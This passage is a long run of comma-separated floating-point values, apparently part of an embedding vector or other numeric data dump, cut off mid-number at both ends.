00024937332,0.0043509407,0.023442907,-0.00006063308,-0.003720308,-0.0028533502,0.009764272,-0.01877115,-0.008217597,0.002435924,-0.0014241349,0.025295392,0.012352382,-0.018320048,0.03823273,-0.008251365,-0.0019063844,-0.007162386,-0.019989993,0.007245018,0.010808446,0.002698085,0.0036137884,0.01985875,-0.029447775,0.015393158,0.00816847,0.015417271,0.0114353765,-0.003957822,0.020889701,-0.0042715715,0.009936685,0.027354218,-0.026391922,0.026721219,0.009755364,-0.008609962,0.011568621,0.012818639,-0.010743188,0.0143670235,0.016525606,0.02292705,-0.020704832,-0.009767238,0.004345648,-0.04307941,-0.007333313,0.024777152,-0.010187978,0.0035934267,0.004539922,0.000301602,0.00097483554,-0.009201657,-0.023344005,-0.007557316,0.024963083,0.004636767,-0.0095512215,0.00054673286,-0.010152346,0.016817799,-0.010833194,0.011298565,-0.0616843,0.020010497,-0.005242922,-0.0053592515,-0.02238501,0.045810055,-0.011661829,0.012301947,0.009232749,0.0010941287,0.012336749,-0.0023914066,-0.013320013,0.0011296205,0.012031954,0.013846607,-0.02070845,-0.037245803,-0.0070528397,0.0047988645,-0.0058927634,0.012215066,-0.005838733,-0.0056965365,-0.002684351,-0.0022587203,0.011865626,0.021402342,0.001303435,-0.03335433,-0.018196369,-0.0024615612,-0.0017115704,-0.005514416,0.01871451,-0.008689362,0.013211242,0.03508975,0.007129358,0.003790002,0.03772264,-0.024579177,-0.018218864,-0.017929766,-0.009543228,0.003178043,-0.016248686,0.025391433,-0.023706317,0.014735173,0.0039126524,0.013931516,0.027995493,-0.008517667,-0.0025655737,-0.0030743715,-0.01280775,0.029827876,-0.001962071,0.0091050435,0.01518618,-0.0035613829,0.01778721,-0.011678783,-0.010350759,0.005342159,0.013086986,-0.006177009,0.004796235,0.010544656,0.0010547745,-0.011574225,0.0014807308,0.015124232,0.015009775,-0.0005300324,0.0065927953,-0.006109371,-0.0024214368,0.02050989,0.016952703,-0.0067432863,-0.015894234,-0.0062568644,-0.0051447586,-0.004061141,0.001467843,0.007563687,0.02568349,-0.007828792,-0.004740121,-0.009657169,-0.020574827,-0.00501353,0.019525088,-0.005284116,-0.023245748,-0.04778679,0.008588077,0.027068434,0.020999251,-0.0013832529,-0.03814949,0.0016497838,-0.008778627,-0.005095252,-0.027118726,0.0062103416,0.0011410322,0.050722275,-0.028395489,0.014809679,0.012133399,-0.030522821,0.012571003,0.023609154,-0.0016811104,-0.0019037622,-0.0070544784,-0.008720612,-0.0044509415,0.021455066,0.013550425,-0.009937251,-0.0007729051,0.028196739,-0.017258195,-0.010310583,-0.0051124156,0.0009144526,0.022091955,-0.010939647,-0.018546542,0.0026358431,-0.016915474,0.021310668,0.006902999,-0.031791188,0.0037438024,-0.0063941954,0.0019062745,0.0022758301,0.00008929521,-0.003377015,0.012456284,0.0070857075,-0.005124551,-0.0003464247,0.011020818,0.019245798,-0.0017378948,0.011764435,-0.028096493,-0.01705497,-0.0141169075,0.015973689,0.010454601,-0.01446974,-0.026026996,-0.005193528,-0.011192886,-0.016809294,-0.0031318252,-0.0128253335,0.011026451,-0.003105999,-0.01058245,0.026801804,0.01761713,0.01281582,0.036424447,-0.00095703494,-0.0046190657,-0.0032051818,-0.013904861,-0.031652786,-0.009743253,0.0070028333,-0.019070245,-0.023248643,0.0093486095,-0.0016338101,-0.028108025,0.009709336,0.020019112,-0.012437281,-0.025805797,0.0021391015,0.039189164,-0.020346094,-0.001589,-0.009210103,0.0032793332,0.018077126,0.004201779,0.000458075,0.004849874,0.0071964893,0.008844317,-0.012026103,0.012054044,-0.01230028,-0.010272661,0.0049118614,0.0009767663,0.0043790834,-0.003120654,0.009043134,-0.037440907,-0.008423821,0.0041235494,0.0067665847,0.01936542,0.011680622,0.005261546,-0.009990203,0.012439378,0.0066468543,-0.013266901,0.004019946,-0.017075686,-0.025801888,-0.008133041,-0.0011414797,-0.011483658,-0.0134596275,-0.020882497,0.029587308,0.007606772,0.03338423,-0.020155992,0.005023201,0.011914799,-0.028840091,0.0100602945,-0.009245488,-0.0065314807,-0.008192264,-0.009104824,0.0010369545,0.010824266,0.014095724,0.013733928,0.0022584738,0.0024509348,-0.016162718,0.005613789,-0.009464311,-0.028484896,0.005559928,0.009950609,-0.017842134,-0.009630336,-0.000013228862,0.0022383488,-0.04234161,0.013157734,-0.010935284,0.015934339,0.001237093,0.0043586977,0.017097889,0.0133746695,-0.018867118,0.012428028,0.013244417,-0.0016281098,0.009526542,-0.010773468,-0.0085361125,0.019528788,0.007323318,-0.026200155,0.020656098,-0.011589194,0.00006978043,-0.0039596735,-0.025498634,0.02776854,-0.0064334874,0.018053079,0.006356957,0.039486423,-0.024543274,0.013149779,-0.0104237115,-0.017010592,0.021370746,-0.016998462,0.017081289,-0.028680969,0.008002811,0.008682346,-0.00021307485,0.0026828868,0.003616556,0.07043128,0.004469634,0.011632852,0.003750744,-0.012181443,0.01530184,-0.020994289,-0.0051253308,0.0033863364,0.00087289966,-0.009933919,-0.008431694,0.0042224918,-0.004808093,0.011491718,-0.014512574,-0.01869347,0.017270375,0.0137517145,0.0066019366,-0.0042849835,0.0028700875,-0.012685211,-0.017099857,-0.019972017,-0.011662987,0.009084208,0.010756672,0.006309598,0.013184933,0.016109377,0.01764748,0.029868372,-0.0062104855,-0.011752737,-0.026699716,-0.005560191,0.0014984489,0.0005974526,-0.013760101,-0.006039803,-0.023212077,-0.020584289,0.027131673,0.0016239327,0.019935561,-0.015989417,-0.0062144957,0.009069571,0.017531045,0.0118624475,-0.028644662,-0.024510315,0.03330587,-0.016093466,0.0065740123,-0.017361253,0.0060951156,-0.011553552,0.0067295926,0.0011943462,-0.0018921476,-0.009912075,0.014756597,-0.0024913987,0.013613138,0.008509387,-0.004655983,0.022681631,0.003833159,0.057144783,-0.0050164126,0.008978376,-0.006361517,0.020226937,0.025336105,0.0021425898,-0.017228667,-0.00089824345,-0.0029366498,0.015287183,-0.009696249,-0.008928681,0.005205256,-0.0059241536,0.028929412,-0.01684966,-0.0011030099,0.010154712,-0.015124036,-0.00069705164,-0.0046695243,0.017818363,0.034213956,0.0054717488,-0.0069470396,0.024176892,0.024141304,0.00073125586,0.0070329225,0.007113851,-0.047547843,-0.009065146,0.014864805,0.00085016194,0.0013013189,-0.011850346,-0.027025692,0.0031045661,0.014599111,0.004964041,-0.006042891,0.0063218754,0.0000029161256,0.014032308,-0.027749434,-0.008478046,-0.002598633,0.1383882,0.010940168,0.0062966263,0.015520797,0.012098924,0.00594255,-0.013286107,-0.0067088157,0.011081821,0.0037390727,-0.0075368634,0.009847017,0.0041407333,-0.041142773,-0.0034953211,-0.008859226,0.027890086,-0.02245063,0.015673334,0.0038408746,0.005109076,0.020450728,-0.009674361,0.0019007727,-0.021614231,0.008152521,0.0077243107,0.028501185,-0.007305393,0.010257899,0.0047200485,0.005866751,-0.00436511,-0.013455483,-0.006541961,0.008339767,-0.028151492,0.016512824,-0.009807773,-0.031598616,0.003677679,0.007989494,-0.015012993,-0.02454999,0.005578172,-0.0061120465,-0.007427075,0.008708076,-0.02845733,-0.0041461703,-0.007833321,0.0035449462,-0.0020575388,0.019715972,0.0120041305,0.013044541,0.01719276,0.009532712,0.011793116,0.01330034,-0.0079205725,-0.010909524,-0.004953947,0.022452429,-0.006688653,0.019002091,-0.016387207,-0.018635252,-0.007214286,0.005488813,-0.018227637,-0.04516744,-0.006539544,0.027444392,0.007978769,-0.014773398,-0.0076341964,-0.016364666,0.002723264,-0.014084795,-0.010776446,-0.008812547,-0.0058132824,0.0046132184,0.006574228,-0.011933361,-0.035960462,-0.017760191,-0.0046078176,-0.03579739,0.016198307,0.002345886,-0.013655006,-0.008838909,-0.0062360563,0.032629926,-0.007873986,-0.003461673,-0.024285346,0.008228405,0.017269632,-0.02457334,0.0036393045,0.026871633,-0.0041465494,-0.024979267,-0.03223271,-0.007403186,-0.0023643994,0.008527438,-0.011721014,-0.0028585654,0.040455613,-0.011726683,0.017632542,-0.0067469263,-0.040596545,0.0010771435,0.0068303077,0.03120398,-0.022271888,-0.030643856,0.014430374,0.005634916,0.037484545,0.0037157077,0.012968175,0.005831277,-0.011979451,-0.010944819,0.0043317247,0.014171896,0.0016808292,0.010065353,0.010390551,0.00034852658,-0.030128246,0.019941043,-0.013878397,-0.03477997,-0.024885653,0.013051548,-0.004552694,-0.03970624,-0.0007045804,-0.00017704074,-0.0102061285,-0.0076766736,0.031305157,0.0007214391,0.008254225,-0.007443038,0.013558973,0.012116109,0.0039086873,-0.010062121,-0.007611128,-0.023341306,-0.0308039,-0.021579001,0.00023367969,0.012705776,0.013528402,-0.042227775,0.011198523,-0.034458492,0.0022719947,0.010105687,-0.011534701,-0.025079481,0.018049287,0.0012570424,0.0019387738,-0.0086665815,-0.0043898397,0.021464169,0.016527768,-0.04735831,0.005681668,-0.0066073206,0.00037404595,0.0005486405,-0.11153133,-0.0045781247,-0.008697314,-0.022651387,-0.0048762127,0.016412737,0.0061456175,0.007334688,-0.004598516,0.0033373826,-0.007924357,-0.0058988794,0.0030632971,-0.018228164,0.003538334,0.01578555,0.039031263,-0.007656546,0.0076855053,0.014059791,-0.007691373,-0.01519084,-0.002042446,-0.00028925037,-0.0056584077,0.033844292,-0.0039944085,-0.00403171,-0.04255344,-0.027479215,-0.009468406,-0.039632477,-0.01372523,0.005464005,-0.01847697,0.01367712,-0.0027692781,-0.013421506,-0.009623732,-0.023222586,0.009566862,-0.02949805,0.05203989,0.019058842,-0.0073203575,-0.0055018323,-0.0037655113,0.018904475,0.019379804,-0.010769628,0.01646153,0.01885683,-0.0014961498,-0.010190173,0.004076825,0.020634396,0.029128753,0.012228032,0.021835824,0.002299234,0.013806844,0.00028866634,-0.018616252,0.018886417,0.011149562,0.012742625,0.008845042,-0.012657675,0.0005273642,-0.023034576,-0.002388413,0.008805137,-0.0020098756,-0.012897698,0.017157223,-0.017174428,0.03509632,-0.013376077,0.0014515374,-0.008978386,-0.00040505445,-0.017716015,0.034382306,0.00002982529,0.021072717,-0.016398806,0.015437565,-0.011828521,0.025954012,0.019179236,0.009869448,-0.029716723,0.011137721,0.0012221134,-0.008686397,0.016931122,-0.0022632843,-0.015653927,-0.0019554682,0.008692694,0.020494832,0.0030951793,0.009057423,-0.018273203,0.014356489,0.008215207,0.014914152,0.005217658,0.0037365153,-0.0054440494,-0.003977329,0.0033249622,-0.01941451,0.012577712,0.000825977,0.007531516,0.02098205,0.008404813,0.0048624524,-0.009594517,0.024423169,0.013862214,-0.008811072,-0.03766314,0.0117559275,0.10606719,0.04141857,0.030739361,-0.0081864735,0.020167425,-0.017566623,0.06438398,0.008595532,-0.0015977323,-0.00909823,0.01159746,-0.020178454,-0.022760062,0.020898188,0.001007167,-0.0051722387,0.016155552,-0.025313908,0.0097855115,-0.0209453,0.012904412,-0.010186503,0.018491961,-0.02226718,-0.028923802,0.0067165326,0.051878072,-0.015305756,-0.0028111879,0.00078017294,-0.0051124054,-0.000887808,0.006574326,-0.008305635,-0.025371363,0.00152657,0.0013812567,0.02334849,-0.023643022,0.0018955776,-0.009717576,0.011166658,0.00071454793,-0.035682507,-0.09214757,0.022977412,0.043971397,-0.02728334,0.021544695,-0.010682745,0.019144781,0.01931119,0.020446789,-0.11373712,-0.0006235279,0.016580928,-0.011323153,0.016398855,-0.008914618,-0.003792106,0.011907542,0.021377333,-0.011245358,0.015313512,0.011564742,0.008438801,-0.012174003,-0.013966796,0.014690221,-0.0030387903,-0.007953958,-0.015170338,-0.029050756,0.01348726,-0.0103978105,0.020436142,-0.0052879932,-0.009906571,-0.011634383,-0.018190956,-0.009774744,0.0132883545,-0.00840775,0.018998066,-0.007591383,0.0063372706,-0.008513184,-0.013176078,-0.009732455,0.035345167,0.0055568963,0.01985795,0.0059707817,0.0031885745,0.06743711,-0.006476005,-0.02516368,-0.016294595,-0.0025509298,-0.00231115,-0.007291925,-0.010826773,-0.00063942646,-0.001496797,-0.0009867246,-0.00081819156,-0.020634325,-0.017260663,0.017297482,0.0053677927,-0.000814809,-0.024177331,-0.011692975,-0.012466436,0.000985337,0.017974425,0.017779961,-0.024364254,0.021042585,0.014470504,0.00070901174,-0.000945829,-0.0029709323,-0.0072284155,-0.0024891992,-0.030863477,-0.0026182341,-0.00850431,-0.020288069,-0.011504153,0.006180672,0.013967027,-0.011445495,0.008604013,0.029164448,0.002705882,0.021465132,-0.003179573,-0.012131786,-0.011511038,0.019203259,0.025924053,-0.014860282,0.0074040843,0.0041183173,-0.013922724,0.0023025905,0.027326606,0.004791445,0.0030229432,-0.01932533,-0.017131226,-0.008608854,0.024202311,0.006574767,-0.00038418485,0.0011648983,-0.019685019,-0.016652474,-0.005685377,-0.004899696,0.016008971,-0.005779205,-0.009289973,-0.011658774,-0.024713645,0.007047009,-0.009579474,0.05169518,-0.02452122,-0.02380477,0.0103690745,0.0005485665,-0.009640576,0.023977168,0.0075306664,0.012607313,0.022901887,-0.033085614,-0.008065472,-0.022854613,0.010674801,-0.006551491,0.0025075995,-0.0024460366,-0.009883409,-0.017940693,-0.0070578,0.015885852,-0.008922726,0.010091405,0.024334807,0.013457772,-0.003651025,-0.0056598326,0.0041414443,0.0017707696,0.0049752654,-0.027765254,0.047675602,-0.0020799467,-0.03518817,0.004745316,-0.000797201,0.0055239545,0.015792718,-0.023025773,0.007053404,-0.0049390676,-0.018643582,-0.0047208485,-0.008996191,0.020097595,-0.022793293,-0.008816999,0.0039625205,0.015534854,-0.002167147,0.010950611,-0.0025997409,-0.030436575,-0.0051965886,0.025918916,0.005919073,-0.013769273,-0.014346744,-0.0069488753,-0.009343451,0.025404204,0.000015542151,-0.003630577,-0.002385355,-0.003820217,0.026872618,-0.046145387,0.005180606,-0.0009961517,0.026672784,0.0028321578,-0.00667599,0.0066347066,0.009094023,-0.015754445,-0.0064761047,-0.015400629,-0.006086996,0.01370146,-0.010101025,0.012990154,-0.015809923,0.022293119,0.0025361457,-0.018291922,-0.010278355,0.018001454,-0.0022292812,-0.0030035637,-0.0034264065,-0.006074104,-0.01236334,-0.010520872,-0.014318208,-0.0050173383,0.007880835,-0.0029645825,0.0024090905,0.004504007,0.0021159304,0.019360907,-0.0024648167,0.019890225,-0.0012290333,0.012793985,-0.001413336,0.008553909,-0.029939141,-0.018258823,-0.02955379,-0.006994053,-0.008466407,0.0068255626,0.013589731,0.0064088465,-0.024147455,-0.056545608,-0.013627019,-0.04130825,-0.03499402,0.016290667,0.012628699,0.021553913,0.020799322,-0.010122169,-0.006701539,-0.010079539,0.0042836913,-0.0028398226,0.01716431,-0.010664391,0.002090441,-0.0021358582,-0.0122243315,-0.005696817,0.0008555604,-0.005826267,-0.009779848,-0.026097713,-0.0023411762,-0.0008831061,-0.012219597,-0.008382159,0.008581142,-0.01727984,-0.018564038,0.022088531,-0.018380268,-0.00423274,-0.013445539,-0.0046187304,0.005834619,-0.006904685,0.018097816,-0.002397557,0.06191964,-0.027415404,-0.0010524254,0.010149539,-0.009863959,0.012248821,-0.011478318,0.03642745,-0.013058275,0.010363932,0.016214443,0.0024909687,0.011199613,0.01591607,-0.0015778815,0.015183537,-0.013116054,-0.0035280706,0.014627553,0.005038919,-0.0069332053,0.01646125,-0.00097183295,0.009025523,-0.0044413265,0.0024669936,-0.012197641,0.001242904,-0.01086321,-0.004103491,0.008857758,-0.013836448,-0.008446359,0.00050858443,-0.022930386,-0.010866096,-0.012531015,0.005895039,0.0028313284,-0.007026766,-0.023694066,0.02553307,-0.008903938,-0.017461779,0.014724986,0.0054380307,-0.029846212,-0.049457524,0.0008415884,0.015415763,0.0021214075,-0.012611047,-0.0042932583,-0.007851448,-0.012864801,0.0063328603,0.0049541276,0.0033428723,-0.024532953,-0.017553002,0.028936837,0.0032104813,0.010874793,0.029654488,0.012509932,-0.0025757528,0.0040435535,0.017165024,0.014056746,-0.021642309,0.0022863569,-0.0030965388,0.0242062,-0.00020866553,-0.0023380478,0.0067828526,0.012112677,0.039990593,-0.013373683,-0.023736339,0.00068997656,0.004490212,0.00050751236,0.002080269,-0.01839586,0.0040601757,-0.014646541,0.016197294,0.0010334253,0.0010918202,0.020163527,0.011505773,0.0057106367,0.0012066523,-0.0043231016,-0.012865245,0.008149773,-0.025829092,0.011364852,0.018374294,-0.011051144,-0.009566954,-0.0058240336,0.025848994,-0.023595251,-0.0075339475,0.010825682,0.023761569,0.019307638,-0.010884947,0.018431231,-0.021345867,-0.011599703,-0.012030085,-0.027024444,-0.011922349,0.004519972,-0.0055458723,-0.037819523,0.013959977,-0.0022982971,-0.024205554,0.01571246,0.016490461,0.0074448097,0.009218054,-0.000032185897,-0.027569044,-0.030934228,-0.0049275183,0.018303705,-0.019319436,0.028233603,-0.012000549,0.0016149611,-0.0058017345,-0.02101338,-0.013576197,-0.0005116071,0.0024994148,-0.010663028,0.00727481,0.0111874975,-0.010896005,0.022672987,-0.008427004,-0.0143387625,-0.001105374,-0.016884958,0.0035970928,-0.010939367,0.0039521637,-0.0014882603,-0.021587148,0.018644651,0.03427383,0.010426051,0.017031854,0.018708358,0.0061423313,-0.021645939,0.0061825905,0.001172642,-0.014049555,-0.009423043,-0.01559195,-0.0059572603,0.027157586,0.0061940392,0.016592603,-0.0069730426,-0.011261668,0.004989686,-0.011871909,0.026676148,-0.003682891,-0.0024046886,0.012678925,0.016262798,0.003991394,-0.020558037,0.029509649,0.009949234,-0.014502552,-0.00003253652,-0.0031878117,-0.010027299,-0.0066791656,-0.015124521,-0.0068407236,-0.006607355,0.003679825,-0.010681032,-0.014222543,0.020565314,-0.021910278,-0.0024041005,0.029053807,-0.019199172,0.0056992704,0.0076278974,-0.00933464,-0.018061372,0.00643578,-0.0075270957,0.006932492,-0.0010781683,0.0151333865,-0.0034380015,0.0056039356,0.013541482,-0.008746757,-0.004411867,-0.03303231,-0.010832377,0.0006546683,0.13086575,0.023399092,-0.02223859,-0.0073184674,0.01461549,-0.0075697685,-0.015480038,-0.0039077317,0.034754276,-0.005073972,-0.0026266812,0.006387138,0.022418952,0.016789751,0.011093772,-0.0070835045,-0.018333694,0.0012429423,0.021490777,-0.015282592,-0.00045344647,0.022098465,0.019771589,-0.00873767,0.017683448,0.008672094,-0.010740742,-0.01040036,-0.004611674,-0.010049964,-0.021361776,-0.0034489154,0.01676573,0.006026605,-0.001812499,-0.0050537805,0.016505383,-0.007192567,-0.0076256855,0.012705227,-0.021576412,0.02613725,0.0026565779,-0.008521359,-0.015207969,0.034174316,0.026159532,-0.020527804,-0.004086131,-0.010417931,0.009450146,0.005819115,-0.012618841,0.0034578422,0.014459815,0.016387789,-0.0042450167,0.000025268606,0.0011342373,0.01889155,-0.0020333894,-0.023376219,0.0031301137,-0.018920531,0.0016138579,-0.010063125,-0.002484243,-0.018287558,-0.009086669,0.0083568245,-0.014961241,0.022114675,0.024416378,0.00059060776,-0.012079179,0.0030882969,-0.00894381,-0.0044731386,0.012592232,-0.0075777667,0.0068340274,-0.015916692,0.0054891887,0.016693847,-0.007291449,-0.013816365,-0.011857702,-0.0077171098,-0.010306675,0.004573126,0.012397921,0.014910248,0.007429639,-0.005188785,-0.0074548344,0.003372141,-0.045636684,-0.07029667,0.016111486,0.018099977,0.01527946,-0.021284254,0.0052941334,-0.0035450023,-0.0060125096,0.00589915,0.018307481,-0.0073575075,0.013618419,0.0263929,-0.010961705,0.0064565465,0.028291928,-0.013746015,0.002784625,-0.010975019,0.029939394,0.022976302,0.009228431,0.006299456,0.003588699,0.0260842,-0.008774809,-0.009685626,0.010424524,0.04041697,-0.013627067,0.0008673852,0.034434225,-0.00368658,0.022655804,-0.009458653,-0.009047254,0.009322735,0.009921073,-0.0005128726,0.0069255894,0.014421819,-0.0015476239,-0.00022592722,0.0052273385,-0.011072747,0.014928401,0.00093801616,0.012311715,0.003455801,-0.003669032,-0.014944766,0.0010873898,-0.024332855,-0.0038616757,-0.010423523,-0.04188802,-0.027675098,-0.015113351,-0.005226239,0.0016581801,-0.00917292,0.0025215433,0.0061176587,-0.020969687,-0.030119697,0.029852467,0.011268206,0.00028453648,0.017476948,0.0031585149,-0.009931882,0.0073744557,0.013111433,-0.011385575,0.027001817,-0.0055959816,-0.03623281,0.010224442,0.025112573,0.00788163,0.0006044665,-0.018733269,-0.036445823,0.012319369,-0.008844626,-0.021721208,-0.009829464,0.002760025,0.012015886,0.012949532,0.027467838,0.031132115,-0.011094036,0.008221222,0.0055854763,-0.0028701846,0.00391192,0.010898079,0.020043729,-0.012661951,-0.016192226,-0.009495342,-0.006021217,0.0003667815,-0.00061417825,-0.031259827,0.024685081,-0.021548852,0.014602426,-0.014020044,0.023007605,0.0022203564,-0.0235337,0.012646935,-0.023566762,0.0048069973,-0.00037041897,-0.00016928109,-0.0028681702,-0.0077242567,0.012270788,0.004185983,0.012937028,0.013109953,-0.026352754,0.008291281,-0.034813937,0.030660428,0.010712604,-0.014188328,-0.01745777,0.01941679,-0.018027142,-0.006821445,0.009048515,0.0015513736,-0.007136919,0.0015339754,0.0098902285,0.0019877644,-0.019843874,-0.013784293,0.02963944,0.015911577,-0.007011222,-0.008037188,-0.032705776,-0.024998758,0.0038917994,0.009183878,-0.025063353,0.02341181,0.008355043,-0.016476043,0.001412015,-0.001761686,-0.0020608178,0.010792746,-0.014462361,-0.012755849,0.017914139,-0.023023989,0.00022797372,-0.024801636,0.016741803,-0.0108944485,0.01049115,0.011341019,-0.00096741057,0.0011080846,-0.004282706,-0.01747172,0.0006437914,0.006844465,0.010708236,0.024536265,0.04852976,0.012969657,0.014165014,0.017146884,0.029711379,-0.000018960156,0.009132171,-0.0102202855,-0.0034145468,0.0035379112,0.005436502,0.017875949,0.004660612,-0.024619082,-0.014505174,-0.0070098294,-0.003153867,0.010713653,0.01639233,0.016138079,0.0022765438,-0.013228838,0.023132537,-0.0027777157,-0.005593252,0.025060987,-0.002993169,-0.025449399,0.0058662086,0.019822966,0.007955469,0.018779695,0.0096005,0.00612758,-0.0066449395,0.01465669,0.0171786,0.004399973,0.012539774,0.029273942,0.009420297,-0.03840545,0.0003917792,0.0037253452,0.012923795,-0.022253433,0.011920743,0.007547652,-0.0016437625,0.039940048,0.015048695,0.027327098,-0.0012011454,0.0075790146,0.000038119146,0.012713205,-0.00523078,0.025976771,-0.009240239,0.0036831324,0.04141224,-0.012545006,-0.02674358,-0.0017358357,0.021324333,0.026190115,-0.0030926727,0.012634539,-0.00208351,0.008886855,0.00080207916,-0.00868254,-0.0029138282,-0.0014234349,-0.0057137124,0.010575336,0.0051122014,-0.028287519,0.00894257,0.0067756223,0.037098356,-0.02103016,0.0020292106,0.01349256,-0.029636135,0.0017338643,0.012654405,0.027636139,0.0056787888,-0.020685378,-0.010138377,-0.03251663,-0.014230613,0.011810408,-0.012616667,-0.016346693,-0.011007985,0.020647617,0.05669666,0.0009679758,-0.014413046,-0.026255667,-0.0039127925,-0.016100354,-0.027373426,0.006804759,0.00142936,0.02279803,0.013349076,0.0035147094,-0.015780125,-0.0024360996,0.016671393,-0.0058866707,0.005388932,0.010691594,0.020225445,-0.025364269,-0.008393381,0.016933309,0.017436504,-0.007760572,-0.0042734467,0.017366957,0.012522877,-0.009891444,-0.012142406,0.0180245,0.0037242575,-0.028492348,-0.010366263,-0.0024274266,-0.0155353425,-0.030339273,0.0006826901,0.0035267752,-0.008898025,0.0284426,-0.004003492,0.0039337967,0.0035272727,0.025910033,-0.015052401,-0.017364576,0.0056746406,-0.021199072,0.005603216,-0.0016863254,0.02639173,0.013168955,0.013956867,-0.0013730953,-0.0028159863,-0.00089811964,0.00900797,0.25157234,0.003807223,0.0061109783,0.009277159,0.0030209713,0.0021280616,0.029707385,0.010004859,0.031568628,0.011644658,-0.0025614721,0.00033720594,-0.002906244,0.002649387,-0.016795866,0.0030739664,-0.0012035046,-0.013712136,-0.0034877735,-0.018214634,0.01220626,-0.009868441,0.010742312,0.00694306,0.038054895,-0.029768208,-0.004563259,-0.015235582,0.022535287,-0.014947504,-0.0033705172,-0.0025142583,-0.002100412,-0.014133171,0.009174154,0.0037504814,-0.0056706313,-0.00874885,0.0074219387,-0.010094045,-0.009716181,-0.017713193,-0.0045491313,-0.017321814,-0.05115333,-0.0062207705,0.013142635,-0.018507255,0.014180539,-0.005000187,-0.006214594,0.016025392,-0.008314723,0.00075108354,0.0069665643,-0.010384069,-0.011221808,0.037418265,0.018661166,-0.010061063,0.0124632185,-0.011417618,-0.00095819915,0.022725834,-0.0050449907,0.015095047,0.0035862913,0.012161038,-0.014683699,-0.0029443994,0.005579394,-0.011912446,-0.015264451,0.008149742,0.00021020912,-0.00036381365,-0.019612197,-0.026918314,-0.007944843,0.0024792382,0.0103606805,0.02257099,0.014751449,-0.036424465,-0.016590606,-0.0008440037,0.0063174684,0.01388578,0.0017926954,0.037645534,-0.0065531014,-0.0047830134,-0.020286486,0.01661766,0.022500984,0.015018847,-0.023422275,-0.0075052534,0.0095703285,0.006927803,-0.020940134,0.004677193,0.019322215,0.009602576,-0.005859621,-0.0016194666,0.03126105,-0.0029495312,-0.004567605,0.008519889,-0.014801917,-0.018087327,-0.0086893225,0.0032623173,0.0099255545,-0.007508542,-0.0028999785,-0.008043153,-0.027430296,-0.013785745,0.006962831,0.0227354,0.002385915,0.016033417,0.0113588385,0.016583545,0.0011562564,-0.009457504,0.021081086,0.012109092,0.0082536945,0.0018511512,0.041394368,0.00489413,0.0082839,0.00578561,0.012216387,0.0088639585,-0.016006997,0.011073954,-0.008893395,-0.010468981,-0.015865404,0.01708013,-0.010823668,-0.01788955,-0.00008865329,0.018756986,-0.014963206,0.0051474613,0.013368294,0.015010991,-0.0006763047,-0.023901206,0.01648036,0.0046301507,-0.00516305,-0.008527715,0.015220789,0.0038632466,0.0035043894,0.026729086,-0.025343675,-0.008698119,-0.0059654284,-0.01835615,0.008350502,0.014940044,0.019870894,-0.00729396,-0.010443827,-0.0042226557,-0.002820985,-0.0012864541,0.0032058023,0.021662675,0.027715547,0.014376459,0.007651148,0.016150609,0.02399762,0.0077004703,-0.013188716,0.011448602,-0.026401289,-0.024708368,-0.015352876,-0.019796977,0.01733886,0.034102492,0.010211768,-0.02242468,-0.006886744,-0.004050389,0.0056695254,0.00042987283,0.0022138846,0.0046619517,-0.012779914,0.0016411004,0.0033612638,0.01631813,-0.016481005,0.0077768774,0.0025905392,0.039415374,0.0058864537,0.033640273,-0.006378479,0.013663164,0.019201327,0.013268512,-0.022523511,-0.004548643,-0.011438212,-0.0018176858,0.024806872,-0.015914377,0.008777039,0.017057488,0.0050920793,-0.0084244935,-0.0069702873,-0.031734817,-0.015049389,-0.0030943924,-0.023866212,0.0018917038,0.011187334,-0.02035818,-0.0036101823,-0.010504595,-0.024221767,0.0074733007,-0.002505522,-0.012599483,-0.014531016,0.014163648,0.002428919,-0.0076463353,0.0076642404,0.004506409,0.016677238,-0.0068038097,-0.027795149,0.005941778,0.006168966,0.00054268306,0.016532999,-0.003195763,-0.004979025,-0.009625003,0.037138563,0.0010964607,0.0049139364,-0.008135187,0.003604616,0.1244024,0.02667159,-0.031101052,-0.00087527896,0.0060713785,0.005638969,0.031351086,-0.0152509725,0.017436322,0.0063297166,-0.002450786,0.019190589,0.013731535,-0.027791271,-0.016165305,0.0059361295,0.013571473,-0.0015378718,-0.009199305,-0.016480666,0.013131068,-0.034785222,-0.013937323,0.056546926,0.030580217,-0.06815029,0.011445188,0.026313577,0.002990983,0.005888969,-0.0017795376,0.0007816049,0.033494074,-0.013519094,-0.011434612,-0.0092715025,0.013827433,-0.019387439,-0.009204722,-0.015900107,0.0195116,0.01101598,0.024721272,-0.02701198,-0.00012557374,0.021897301,-0.0032439434,0.006285287,-0.017051974,-0.008872131,-0.006585871,0.009976798,-0.005020754,0.00466496,-0.0038963666,-0.018384764,-0.000040884846,-0.026746007,0.008140269,0.007827901,0.014013406,-0.014752176,-0.00925315,0.008988439,-0.0047636046,-0.017492956,-0.005684328,0.017390529,-0.05374961,-0.016758006,0.009581949,0.006246891,0.006169649,0.0076537374,-0.021156857,0.037255757,-0.00865673,-0.005585562,-0.0066552614,-0.0040844525,0.008938905,0.013558939,0.005154464,0.00025918693,0.021337856,0.011356011,-0.0071692844,0.008019692,-0.0053219222,-0.006183044,0.00462615,0.01707915,-0.019313633,-0.0113990065,-0.025524564,-0.0038578743,0.038291667,-0.011498487,0.005550366,-0.011550517,0.004182093,-0.012211125,0.013538576,0.000025260162,-0.015397094,-0.0040415027,0.0016415663,0.0056275157,0.0037163673,0.008725352,0.00040602332,-0.002524259,-0.011228815,0.014691894,-0.00040103198,-0.0040511787,-0.0072382423,-0.02108777,-0.0025761274,-0.0118889185,-0.001962763,0.016267575,0.021510743,0.012950367,-0.025559893,0.0032982798,-0.00752498,0.020008313,0.0021748436,-0.0039978763,0.0024691562,-0.037640996,0.019947913,0.0048809773,0.0044389693,0.0075120917,0.0031596187,-0.0030539245,0.0060780784,-0.0025726422,0.013492442,0.0049948595,0.015019982,0.010764912,-0.008683111,-0.021155152,-0.013141624,0.0018219107,0.011832376,0.012042485,-0.024336707,0.008676869,0.012814934,0.002238781,-0.024233662,-0.004765992,0.027906837,0.019952094,0.009439519,-0.0030895723,-0.0010213975,0.013884103,0.027701538,-0.027915053,0.012165613,0.012698318,-0.013198254,0.013740417,-0.02093751,0.01265411,0.0009735153,-0.018499989,-0.0053389724,0.016706789,0.008794802,0.013998218,0.0190884,0.016395647,0.0085739605,-0.0017425503,0.015263693,0.029883903,-0.017884351,0.0063049323,0.0083637955,-0.007906126,0.018653102,0.018110719,-0.0009445855,0.023005119,-0.007060883,0.017004104,0.0067010485,0.01808318,-0.0063907243,-0.00027810642,-0.019864028,0.04107287,-0.004498356,-0.033833325,0.0012575464,-0.006007496,0.003478379,0.011901126,0.014833797,0.0034219532,-0.